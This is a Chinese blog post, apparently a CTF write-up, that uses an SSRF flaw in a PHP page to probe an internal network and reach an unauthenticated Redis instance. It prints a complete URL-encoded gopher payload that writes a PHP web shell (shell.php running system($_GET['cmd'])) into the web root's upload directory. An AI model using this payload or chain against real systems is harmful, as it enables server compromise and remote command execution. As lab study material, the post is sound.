Redis未授权访问

最新推荐文章于 2024-08-26 01:47:01 发布
最新推荐文章于 2024-08-26 01:47:01 发布
阅读量434 收藏 3
点赞数 8
分类专栏: SSRF 文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/thewei666/article/details/141507483
版权

目录

1、题目

2、分析

Redis可以进行未授权访问需要满足一下条件:

  1. 无密码登录
  2. protect-mode设置为no
  3. 绑定在0.0.0.0或127.0.0.1(配合ssrf)

1、题目

2、分析

由PHP代码可知,传入的参数为url,然后经过正则匹配后执行该url

额外信息为可以传入参数info,来查看phpinfo

可以得到当前主机的IP地址信息为172.19.0.3,那么就可以绕过127.0.0.1,使用http协议去探测这台主机上面的存活端口以及C段存活主机

http://192.168.104.128:8091/?url=http://172.19.0.3:80

使用BP爆破端口,可以看到目前服务器好像只有一个80端口有用。

BP爆破一下内网的存活主机,可以发现172.19.0.2的数据包有异

爆破一下179.19.0.2的端口

可以发现6379存活

使用gopherus工具生成gopher协议shell

尝试传入生成的值或者二次编码后在传入,结果:网页瞬间刷新,无反应

造成的原因可能有两种:一种是无权限写入,另一种是写入的路径错误。

但是通过phpinfo得知的信息是当前目录为/var/www/html

所以应该是无权限写入,那么就需要爆破子目录,看看子目录有没有写入权限

查看到当前路径下有一个子目录为upload,对该目录在进行一次写入看看

gopher://172.19.0.2:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2420%0D%0A/var/www/html/upload%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

我们可以看到没有报错,所以已经创建了这个文件。

魏大橙
关注
专栏目录
redis授权访问
m0_56578216的博客
09-02 955
前提条件:1.
Redis授权访问漏洞
周星星的博客
08-22 1579
Redis授权访问漏洞复现以及利用
笔记:redis授权访问
02-22 262
笔记:redis授权访问
redis 允许外网访问
志存高远
05-30 2710
允许Redis公开在网络上可访问会带来严重的安全风险,因为Redis默认没有密码认证。除非绝对必要,否则不建议这样做。如果必须开放外网访问,务必实施额外的安全措施,如设置强密码、使用SSL/TLS加密连接、配置网络访问控制列表(ACLs)或使用安全隧道(如SSH隧道)。
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
Redis授权访问漏洞的重现与利用
qq_40882763的博客
03-24 2064
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
redis授权访问漏洞)
最新发布
qq_68600196的博客
08-26 881
本文介绍如何复现并利用Redis授权访问漏洞,以达到远程代码执行和获取系统权限的目的。Redis版本(2.8),于Ubuntu环境下进行。SSRF(Server-Side Request Forgery)是一种网络安全漏洞,允许攻击者欺骗服务器去访问或获取本不应该被访问的资源。通常,SSRF漏洞出现在服务器端应用程序中,当它们从用户输入中生成请求时,攻击者可以利用这一点来进行恶意操作。
漏洞复现之Redis授权访问
m0_56190544的博客
09-13 2673
本文详细介绍了redis授权访问漏洞的原理以及利用方法,供大家参考学习
Redis 授权访问原理、危害及复现
新青年1号
01-03 1715
Redis 授权访问准确的来说,其实并不是一个漏洞。而是由于开发人员配置不当,而产生的预料之外的危害
Redis授权访问漏洞是什么?如何复现(包括整理出在复现过程中遇到的各种问题)+编写扫描检测脚本
sGanYu
03-19 6711
目录 Redis授权访问漏洞原理 环境配通常来说置:CentOS下安装Redis 手工授权访问验证 利用方式 在攻击机中使用ssh免密登陆靶机 利用漏洞写入webshell 编写脚本检测 授权访问漏洞可以理解为安全配置不当、在需要进行权限认证处对当前用户进行权限识别,导致攻击者在没有获取到登录权限或授权的情况下,对目标进行操作或者被信息泄露 常见的授权漏洞: Redis 授权访问漏洞 MongoDB 授权访问漏洞 JBOSS 授权访问漏洞 VNC 授权访问漏洞 宝塔
Redis授权访问漏洞详解(全面)
m0_64481831的博客
02-26 3883
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。
redis授权getshell四种方式
没有
04-24 5076
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上,然后在从机上加载so文件,我们就可以执行拓展的新命令了。
redis授权访问的利用方式
Redredredfish的博客
08-23 1556
redis授权访问的利用方式 漏洞原理Redis<3.2默认情况下,会绑定在0.0.0.0:6379,如果没有进行采用相关的安全策略,比如添加防火墙黑白名单等等,这样会将Redis服务暴露在公网上。 如果在没有设置密码(默认为空)的情况下,会导致任意用户可以授权访问Redis以及读取Redis的数据。攻击者利用Redis自身的提供的config命令,可以进行写文件操作,还可以将ssh公钥写入目标服务器./root/.ssh下的authotrized_keys 文件中,进而可以利用对应私钥直接使
最新网络安全岗位面试题汇总(附答案解析)
m0_60571990的博客
05-10 2353
最新网络安全岗位面试题汇总(附答案解析)
Redis授权访问与SSH key利用分析
"Redis授权访问配合SSH key文件利用详解" 本文主要探讨了Redis授权访问的安全风险,以及如何利用这种漏洞配合SSH key文件进行恶意活动。Redis是一个高性能的键值存储系统,常用于缓存和数据持久化,但其默认...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

魏大橙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值